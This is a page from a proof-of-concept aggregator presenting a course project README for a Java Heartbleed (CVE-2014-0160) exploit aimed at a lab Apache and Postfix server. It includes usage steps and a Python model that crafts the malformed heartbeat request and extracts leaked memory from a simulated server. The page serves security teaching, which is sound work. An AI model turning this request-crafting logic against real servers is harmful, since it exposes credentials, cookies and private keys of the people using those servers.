Related vulnerability
Title:
OpenSSL buffer error vulnerability
(CVE-2014-0160)
Description: OpenSSL is an open-source, general-purpose cryptographic library developed by the OpenSSL team that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols; it supports many cryptographic algorithms, including symmetric ciphers and hash functions. A security vulnerability exists in the files d1_both.c and t1_lib.c of OpenSSL's TLS and DTLS implementations: when processing Heartbeat Extension packets, a bounds check is missing. A remote attacker can exploit this with a specially crafted packet to read sensitive information from server memory (such as usernames, passwords, cookies and private keys). The following versions of OpenSSL are affected
Description
This is the Heartbleed bug (CVE-2014-0160) documentation I did for the Advanced Cyber Attacks course.
Introduction
# Heartbleed Attack: Java-Based Attack Demo
## Overview
This repository features `Heartbleed.java`, a custom Java-based exploit designed to demonstrate the Heartbleed vulnerability (CVE-2014-0160) by extracting sensitive data from a vulnerable server (IP: 192.168.1.132) running Apache (port 443) and Postfix (port 465). The exploit sends malformed TLS heartbeat requests, leveraging the vulnerability in unpatched OpenSSL versions (1.0.1 to 1.0.1f) to leak up to 64KB of memory per request. Supporting Bash scripts (`apache_memload.sh` and `postfix_memload.sh`) flood the services’ memory with sensitive data, such as user credentials, mail server passwords, and SSL certificates, which the Java exploit then extracts.
This project is part of a comprehensive security demonstration documented in a detailed Word document, which outlines the attack methodology, results, and implications for both Apache and Postfix services. The work involved crafting scripts to load memory, executing the exploit from a Windows client (IP: 192.168.1.99) and analyzing the leaked data to highlight the vulnerability’s impact.
## About the Heartbleed Exploit
`Heartbleed.java` is the core of this demo, implementing a streamlined attack process:
- Establishes a connection to the target server and completes a TLS handshake.
- Sends malformed heartbeat requests via the `sendHeartbeats` method, which is central to the exploit.
- Captures and displays the server’s response, revealing sensitive data in ASCII format.
The `sendHeartbeats` method drives the attack: it repeatedly sends crafted heartbeat messages whose claimed payload length exceeds the number of bytes actually sent, so an unpatched server copies that many bytes out of its own memory into the response. Its role is detailed in the accompanying Word document, alongside a screenshot of its implementation.
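To make the missing bounds check described in the vulnerability summary above concrete, the following Python model is an added example (not code from this repository and not OpenSSL's code): it builds the same kind of malformed HeartbeatRequest that `sendHeartbeats` sends, feeds it to a toy server that implements both the vulnerable OpenSSL 1.0.1 heartbeat logic and the two length checks added in 1.0.1g, and parses the response the way a client would. The server "heap" contents are constructed; `HeartbeatServer`, `build_heartbeat_request`, `extract_leak` and `demo` are names chosen here.

```python
"""Heartbleed (CVE-2014-0160) worked example: craft the malformed
HeartbeatRequest an exploit such as Heartbleed.java sends, then run it through
a model of OpenSSL's vulnerable and patched tls1_process_heartbeat() logic.
Added illustration, not code from the HeartbleedAttack repository; the server
"heap" is a constructed byte buffer and nothing touches the network."""
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat (RFC 6520)
TLS1_0 = b"\x03\x01"
HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16                  # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat_request(claimed_len, payload=b"", version=TLS1_0):
    """TLS record carrying a HeartbeatRequest whose payload_length field
    claims `claimed_len` bytes although only len(payload) bytes are sent.
    claimed_len=0xFFFF is the classic 64 KB over-read."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING
    return bytes([TLS_HEARTBEAT]) + version + struct.pack("!H", len(body)) + body


def parse_record(record):
    """Split a TLS record into (content_type, version, fragment)."""
    ctype, ver, length = struct.unpack("!B2sH", record[:5])
    return ctype, ver, record[5:5 + length]


class HeartbeatServer:
    """Models the heartbeat path of an OpenSSL server. The received record is
    placed at the start of a byte buffer and `heap_secrets` stands in for the
    unrelated allocations that follow it in process memory (what the memload
    scripts plant: requests, credentials, keys)."""

    def __init__(self, heap_secrets, patched):
        self.heap_secrets = heap_secrets
        self.patched = patched

    def process(self, record):
        ctype, _ver, frag = parse_record(record)
        if ctype != TLS_HEARTBEAT:
            return None
        rrec_length = len(frag)                  # s->s3->rrec.length: bytes actually received
        heap = bytes(frag) + self.heap_secrets   # record followed by neighbouring heap data
        if self.patched and 1 + 2 + PADDING > rrec_length:
            return None                          # fix 1: record too short, silently discard
        hbtype = heap[0]
        payload_len = struct.unpack("!H", heap[1:3])[0]   # n2s(p, payload): attacker-controlled
        if self.patched and 1 + 2 + payload_len + PADDING > rrec_length:
            return None                          # fix 2: claimed length exceeds record (RFC 6520 s.4)
        if hbtype != HB_REQUEST:
            return None
        # Vulnerable path: memcpy(bp, pl, payload) copies payload_len bytes starting at
        # the payload, running past the record into whatever follows on the heap.
        # (A real server keeps reading up to 64 KB; this model's heap simply ends.)
        leaked = heap[3:3 + payload_len]
        body = struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * PADDING
        return bytes([TLS_HEARTBEAT]) + TLS1_0 + struct.pack("!H", len(body)) + body


def extract_leak(response, sent_payload):
    """Client side: drop the echo of our own payload; whatever remains is memory
    the server should never have sent. Returns b"" for an honest response."""
    _ctype, _ver, frag = parse_record(response)
    hbtype, payload_len = struct.unpack("!BH", frag[:3])
    if hbtype != HB_RESPONSE:
        raise ValueError("not a HeartbeatResponse")
    return frag[3:3 + payload_len][len(sent_payload):]


def demo():
    """Returns (leak obtained from the vulnerable server, patched server's answer)."""
    # Constructed heap contents, mimicking what apache_memload.sh would leave behind.
    secrets = (b"POST /phpmyadmin/memload.php HTTP/1.1\r\n"
               b"Cookie: PHPSESSID=constructed-session-id\r\n\r\n"
               b"user=alice&pass_hash=$6$constructedsalt$constructedhash\r\n")
    request = build_heartbeat_request(0xFFFF, b"HB")   # claims 65535 bytes, sends 2
    vulnerable = HeartbeatServer(secrets, patched=False).process(request)
    patched = HeartbeatServer(secrets, patched=True).process(request)
    return extract_leak(vulnerable, b"HB"), patched


if __name__ == "__main__":
    leak, patched = demo()
    print("patched server answered:", patched)        # None: request silently dropped
    print("vulnerable server leaked %d bytes:" % len(leak))
    print(leak.decode("latin-1"))
```

The leak begins with the 16 padding bytes of the request itself, exactly as real Heartbleed dumps do, and then runs into neighbouring heap data; the patched model answers only when the claimed length fits inside the record that was actually received.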
## Project Scope and Documentation
The full scope of this work includes:
- **Memory Flooding**: Developed `apache_memload.sh` to flood Apache’s memory with 50 `curl` requests, embedding sensitive data like SHA-512 password hashes via a PHP script (`memload.php`). Similarly, `postfix_memload.sh` sends 50 SMTP payloads to Postfix, embedding email credentials and passwords.
- **Exploit Execution**: Ran `Heartbleed.java` from a Windows client (IP: 192.168.1.99) to target Apache (port 443) and Postfix (port 465), successfully leaking data such as user credentials, passwords, and certificates.
- **Documentation**: Compiled a detailed Word document capturing the attack setup, execution, and results. It includes service verification (Apache and Postfix), attack descriptions, screenshots of script outputs and leaked data, an explanation of the `sendHeartbeats` method, and a conclusion with future mitigation strategies.
## Prerequisites
- **Server**:
- Ubuntu Linux server (IP: 192.168.1.132) with:
- Apache2 on port 443 (vulnerable OpenSSL 1.0.1c).
- Postfix on port 465 (vulnerable OpenSSL 1.0.1c).
- `memload.php` at `https://localhost/phpmyadmin/memload.php`.
- **Client**:
- Windows client (IP: 192.168.1.99).
- Java Development Kit (JDK). The README gives the Debian/Ubuntu command `sudo apt install openjdk-11-jdk`; on the Windows client install an equivalent JDK 11 build.
- **Network**:
- Client must reach server on ports 443 and 465.
## Installation
1. **Clone the Repository**:
```bash
git clone https://github.com/Shayhha/HeartbleedAttack
```
2. **Compile the Exploit** (the source lives under `src/`):
```bash
javac -d bin src/Heartbleed.java
```
## Usage
1. **Flood Server Memory** (on 192.168.1.132):
- Apache:
```bash
~/Desktop/apache_memload.sh
```
- Postfix:
```bash
~/Desktop/postfix_memload.sh
```
2. **Run the Exploit** (on 192.168.1.99):
- For Apache (port 443), edit `src/Heartbleed.java` to set `SERVER_PORT = APACHE_PORT`, recompile, then run:
```bash
javac -d bin src/Heartbleed.java
java -cp bin Heartbleed
```
- For Postfix (port 465), edit `src/Heartbleed.java` to set `SERVER_PORT = POSTFIX_PORT`, recompile, then run:
```bash
javac -d bin src/Heartbleed.java
java -cp bin Heartbleed
```
## Results
- **Apache**: Leaked user credentials, mail server passwords, SHA-512 password hashes, and SSL certificates.
- **Postfix**: Extracted email headers, shell commands, credentials, passwords, and SSL certificates.
## Ethical Use
This exploit is for educational purposes only. Do not use it to harm systems without explicit permission. Ensure compliance with legal and ethical standards.
## License
MIT License—see [LICENSE](LICENSE.txt) for details.
File snapshot
[4.0K] /data/pocs/516ece384e0c4214c382ec6c2f7a1e1daca45a87
├── [4.0K] Bash Scripts
│ ├── [ 742] apache_memload.sh
│ ├── [ 648] memload.php
│ └── [ 742] postfix_memload.sh
├── [4.0K] bin
│ └── [6.0K] Heartbleed.class
├── [4.0K] Heartbleed Attack Demonstration
│ └── [ 210] Heartbleed Attack Demonstration Video.txt
├── [4.0K] Heartbleed Attack Demonstration Screenshots
│ ├── [4.0K] Attacks
│ │ ├── [4.0K] Apache
│ │ │ ├── [617K] Apache leaked HTTPS request and SSL certificate that was used for TLS connection.png
│ │ │ ├── [550K] Apache leaked mail users credentials, including their SHA-512 password hashes and the mail server's database tab.png
│ │ │ ├── [655K] Apache leaked MySQL users credentials, including their SHA-256 password hashes.png
│ │ │ └── [464K] Running apacche_memload.sh to load sensatvie data into Apache memory.png
│ │ └── [4.0K] Postfix
│ │ ├── [1.1M] Postfix leaked mail users information and SSL certificate that was used for TLS connection.png
│ │ ├── [218K] Postfix leaked shell commands used for sending email containing sensative data, including mail password.png
│ │ ├── [1.1M] Postfix leaked the email headers of messages sent via SMTPS, including the sender and recipient information.png
│ │ └── [407K] Running postfix_memload.sh to load sensative data into Postfix memory.png
│ ├── [4.0K] Database with mail users
│ │ ├── [821K] Showing local mail users in mailserver database with their hashes.png
│ │ ├── [1.4M] Showing the user table in mysql database with phpMyAdmin.png
│ │ ├── [829K] Showing the virtual users table in mailserver database with phpMyAdmin.png
│ │ └── [469K] Showing user’s mailbox with emails he received from shay.png
│ ├── [4.0K] OpenSSL
│ │ ├── [646K] Apache, MySQL and Postfix are using OpenSSL 1.0.1c.png
│ │ ├── [4.0K] Mechines Info
│ │ │ ├── [572K] Ubuntu Linux server running OpenSSL 1.0.1c with IP 192.168.1.132.png
│ │ │ └── [ 44K] Windows running Java Heartbleed exploit with IP 192.168.1.99.png
│ │ ├── [101K] Ubuntu Linux server is using OpenSSL 1.0.1c.png
│ │ ├── [929K] Verifying Apache is vulnerable using NMAP Heartbleed test (on Kali Linux machine).png
│ │ └── [913K] Verifying Postfix is vulnerable using NMAP Heartbleed test (on Kali Linux machine).png
│ ├── [4.0K] Postfix with Dovecot
│ │ ├── [1.2M] Reading email in user inbox via Dovecot with IMAP on port 993.png
│ │ └── [928K] Sending email from shay to user via Postfix with SMTPS on port 465.png
│ ├── [4.0K] Scripts
│ │ ├── [349K] Bash script apache_memload.sh for flooding Apache.png
│ │ ├── [548K] Bash script postfix_memload.sh for flooding Postfix.png
│ │ ├── [489K] PHP script memload.php.png
│ │ └── [ 87K] sendMessages method - Heartbleed.java.png
│ └── [4.0K] Sevices
│ ├── [1.3M] Apache service is running on port 443 (HTTPS).png
│ ├── [1.3M] Dovecot service is running on port 993 (IMAP).png
│ ├── [845K] MySQL service is running with phpMyAdmin.png
│ └── [763K] Postfix service is running on port 465 (SMTPS).png
├── [4.0K] Heartbleed Attack Documentation
│ ├── [ 14M] Heartbleed Attack Demonstration.docx
│ ├── [5.2M] Heartbleed Attack Demonstration (PDF).pdf
│ └── [621K] Heartbleed Attack Presentation.pptx
├── [1.0K] LICENSE.txt
├── [4.3K] README.md
└── [4.0K] src
└── [9.5K] Heartbleed.java
15 directories, 39 files
Notes
1. It is recommended to access the code via the original source first.
2. If the source has been removed or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.